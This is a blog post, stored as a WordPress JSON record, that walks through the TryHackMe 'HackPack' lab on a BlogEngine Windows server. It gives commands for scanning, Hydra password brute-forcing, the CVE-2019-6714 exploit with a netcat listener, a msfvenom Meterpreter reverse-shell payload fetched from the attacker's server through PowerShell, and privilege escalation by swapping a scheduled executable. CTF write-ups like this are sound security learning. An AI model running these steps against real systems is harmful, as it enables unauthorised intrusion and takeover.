{"id":251,"date":"2024-08-20T17:54:38","date_gmt":"2024-08-20T17:54:38","guid":{"rendered":"https:\/\/paradoxa.me\/?p=251"},"modified":"2024-08-20T18:27:01","modified_gmt":"2024-08-20T18:27:01","slug":"hackpack-tryhackme-challenge","status":"publish","type":"post","link":"https:\/\/paradoxa.me\/index.php\/2024\/08\/20\/hackpack-tryhackme-challenge\/","title":{"rendered":"~ HackPack – TryHackMe Challenge"},"content":{"rendered":"

HackPack – TryHackMe
\nCTF Challenge<\/h1>\n

click the link to show the procedure with images
\nHackPack<\/a> (html version of my notes in Joplin)<\/h2>\n

<\/h3>\n

TOOLS USED: Nmap, Burp, Hydra, Meterpreter, Winpeas and others<\/h3>\n

Target IP: 10.10.31.124<\/strong><\/p>\n

Task 1<\/h2>\n

scan the target ip:<\/p>\n

nmap -p- -sV -sC -oN nmap-all -T4 -Pn 10.10.31.124<\/pre>\n
At this point we navigate to the open port 80 on the browser and we find the answer to the question<\/p>\n
– Whats the name of the clown displayed on the homepage?<\/strong>
\n– pennywise<\/strong><\/p>\n
\nTASK 2<\/h2>\n
from the home page we check the source code and other pages and after pressing the burger menu (top right), we discover a log in page called \/admin<\/p>\n
to be shure though we run also gobuster to find any other hidden directories before moving on<\/p>\n
gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-small.txt -u 10.10.31.124<\/pre>\n
it picked up a lot of search directories and few other but our interest stays on \/admin<\/p>\n
While gobuster was working I went on the browser and looked for “blogengine default credentials” and discover that are admin:admin.
\nAlthogh typing those we aren’t able to log in. We will try to keep admin as the username and use hydra to look for the password.<\/p>\n
But first we use burp to intercept the package and find the first answer<\/p>\n
– What request type is the Windows website login form using?<\/strong>
\n– POST<\/strong><\/p>\n
Now we can use Hydra<\/p>\n
hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 10.10.31.124 http-post-form \"\/Account\/login.aspx:__VIEWSTATE=9il1lfwD7z3650sgscKbmxa1Kw086WYNaycWzUhOYKqAExKpRbcZyZxklwuzotjjJoI6Nfo1bcbmG8a9Fzrhnk91K6V64w08lBNCrDxV02T9xh8%2BT4sDA5f1PAFpf1R6ClLOWofti%2FmD1Znm12DPTjDj35tOo9U11eMZ%2BVY53OfEI452xh%2Bz7Z76ZyJVfi6ogep8q%2BSkBfk5CHqnGPNYkcbXQJb8iUyTYbi6kglUL%2BsHLTiZCL12KSYJtiwN0QwTmN24%2F74qhO98%2BP6FSeAzAPfCnZDDrPjdXh7vOdk%2Fq%2FA%2BB6bolEAI91%2BM5XbP4v%2F2MLeu%2BdcSENrZoTR8q1LDaj2xFCt3HIefni4%2FMAug%2F45%2BTgp8&__EVENTVALIDATION=WAoBqw2g1eK49jrQPzW2%2FIe8WGlB%2FBc%2FIs8%2BO9rpQ30OPjEgc7Z0w4Q%2FY6vOmxyexmPXwfJ7xfDDNiU1twBWJYNnI2UQIYeaGxrhnk3Ic%2BM4wgp3ty%2F%2Fgp7zsZLnJpRiUpe%2BGStLBkNJtQVz6C%2B8byrJV98%2FDcld%2BeWApW6kEk1n0EzV&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed\"<\/pre>\n
– Guess a username, choose a password word-list and gain credentials to a user account!<\/strong>
\n– 1qaz2wsx<\/strong><\/p>\n
TASK 3<\/h2>\n
Now that we have access, we look to vulnerabilities that can be exploited, ON the about page we find the version of BlogEngine<\/p>\n
– Now you have logged into the website, are you able to identify the version of the BlogEngine?<\/strong>
\n– 3.3.6.0<\/strong><\/p>\n
Now we use searchsploit (or a webbased one) to look for an exploit and copy it in our folder<\/p>\n
searchsploit BlogEngine.net 3.3.6\r\nsearchsploit -m exploit\/aspx\/webapps\/46353.cs<\/pre>\n
– What is the CVE?<\/strong>
\n– CVE-2019-6714<\/strong><\/p>\n
Open with nano the file, read the instruction and change the IP address with yours and you can also change the port<\/p>\n
As we were told in the instruction file, copy it as PostView.ascx and start listening<\/p>\n
nc -nlvp 6576<\/pre>\n
now we go on the webpage, post –> new post and upload the file<\/p>\n
Once we do that we keep following the instructions and navigate to http:\/\/10.10.31.124\/?theme=..\/..\/App_Data\/files and we get the shell<\/p>\n
– Who is the webserver running as?<\/strong>
\n– iis apppool\\blog<\/strong><\/p>\n
TASK 4<\/h2>\n
note: the target ip address changed to 10.10.252.126 as i had to restart the machine<\/strong><\/p>\n
Now we need to create a payload with meterpreter:<\/p>\n
msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.x.x.x LPORT=7766 -f exe -o shell.exe<\/pre>\n
On another terminal we open a python server to upload the payload<\/p>\n
python3 -m http.server 8888<\/pre>\n
and on the previous gained shell to download (under the windows\/tmp) the payload<\/p>\n
powershell -c \"Invoke-WebRequest -Uri 'http:\/\/10.9.1.77:8888\/shell.exe' -OutFile 'c:\\Windows\\Temp\\shell.exe'\"<\/pre>\n
Now execute the payload with metasploit after and adjusting the options<\/p>\n
run payload on target machine and watch session starting<\/p>\n
from here to check the os and type sysinfo to check the os<\/p>\n
-What is the OS version of this windows machine?<\/strong>
\n-Windows 2012 R2 (6.3 Build 9600)<\/strong><\/p>\n
We move to program files to replace it with a payload so we escalate<\/p>\n
cd \"c:\\program files (x86)\"\\SystemScheduler<\/pre>\n
but if we check the Events\/20198415519.INI_LOG.txt we see that Message.exe run every 30sec<\/p>\n
Inside this folder c:\\Program Files (x86)\\SystemScheduler we rename message.exe to message.bak<\/p>\n
mv Message.exe Message.bak<\/pre>\n
On our local machine, we rename the shell.exe payload to Message.exe and upload it to the target machine folder<\/p>\n
powershell -c \"Invoke-WebRequest -Uri 'http:\/\/10.9.1.77:8888\/Message.exe' -OutFile 'c:\\Program Files (x86)\\SystemScheduler\\Message.exe'\"<\/pre>\n
Now will execute the payload automatically every 30 seconds and we get the shell<\/p>\n
In Admin desktop we find root.txt<\/strong><\/p>\n
In Jeff’s desktop we find the other flag<\/strong><\/p>\n
Task 5<\/h2>\n
From the meterpreter session, we type shell to enter powershell
\nWith the python web server running, as before, we transfer the winPEAS.bat file to the target maching<\/p>\n
powershell -c \"Invoke-WebRequest -Uri 'http:\/\/10.9.1.77:8888\/winPEAS.bat' -OutFile 'c:\\Windows\\Temp\\winPEAS.bat'\"<\/pre>\n
we type .\\winPEAS.bat to run winPeas and wait<\/p>\n
Under the OS system info list, we find a line that states “Original Install Date”, and we’ve got our answer to the the last question<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"
HackPack – TryHackMe CTF Challenge click the link to show the procedure with images HackPack (html version of my notes in Joplin) TOOLS USED: Nmap, Burp, Hydra, Meterpreter, Winpeas and […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"iawp_total_views":19,"footnotes":""},"categories":[1,45,38,44],"tags":[46,47,42],"class_list":["post-251","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf-challenge","category-cybersecurity","category-tryhackme","tag-ctf","tag-hackpack","tag-try-hack-me"],"_links":{"self":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts\/251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/comments?post=251"}],"version-history":[{"count":3,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts\/251\/revisions"}],"predecessor-version":[{"id":255,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/posts\/251\/revisions\/255"}],"wp:attachment":[{"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/media?parent=251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/categories?post=251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/paradoxa.me\/index.php\/wp-json\/wp\/v2\/tags?post=251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}